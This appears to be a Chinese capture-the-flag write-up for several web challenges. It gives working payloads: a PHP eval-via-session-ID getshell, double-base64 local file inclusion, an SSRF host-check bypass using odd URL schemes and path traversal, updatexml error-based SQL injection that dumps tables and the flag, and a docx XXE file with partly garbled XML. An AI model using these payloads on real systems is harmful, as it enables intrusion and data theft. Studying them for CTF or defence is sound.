无字符GETSHELL就行
payload:eval(hex2bin(session_id(session_start())))
改PHPSSEION值为16进制就行
把file后面的参数两层base64解开,就知道可以包含其他文件,两层base64编码就行
第一层读index.php
error_reporting(E_ALL || ~E_NOTICE);
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['file']))
header('Refresh:0;url=./index.php?file=WTNSbWFXMWhaMlV1YW5Cbg==');
$file = base64_decode(base64_decode($_GET['file']));
echo '' .$_GET['file'].'';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo 'input_filename: '. $file.'';
$file = str_replace("ctf","flag", $file);
echo 'real_filename: '.$file.'';
$txt = base64_encode(file_get_contents($file));
echo "
";
/*
* Can you find the flag file?
*
* Hint: hal0flagi5here.php
*/
继续读hal0flagi5here.php
$argv[1]=$_GET['url'];
if(filter_var($argv[1],FILTER_VALIDATE_URL))
{
$r = parse_url($argv[1]);
print_r($r);
if(preg_match('/happyctf\.com$/',$r['host']))
{
$url=file_get_contents($argv[1]);
echo($url);
}else
{
echo("error");
}
}else
{
echo "403 Forbidden";
}
?>
这里卡了我很久,用data://happyctf.com/plain,base64,xxxxx只能构造返回体,不能任意读文件。
通过测试,file_get_contents()中如果是不规范的协议,则进行本地文件包含,构造
0://happyctf.com/../../../../flag.txt
compress.zlib://happyctf.com/../../../../../../flag.txt
这两种都可以
这种涉及注册登录改密页面的,一般都是二次注入
ccc"||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)#
ccc"||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())),0x7e),1)#
ccc"||updatexml(1,concat(0x7e,(select(flag)from(flag)),0x7e),1)#
下载模板docx文件,后缀改为zip,直接在zip下修改docProps/core.xml
文件内容为
]>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title>&xxe;dc:title>
<dc:subject>dc:subject>
<dc:creator>dc:creator>
<cp:keywords>cp:keywords>
<dc:description>dc:description>
<cp:lastModifiedBy>cp:lastModifiedBy>
<cp:revision>1cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2015-08-01T19:00:00Zdcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-01T19:01:00Zdcterms:modified>
cp:coreProperties>
改回docx格式上传即可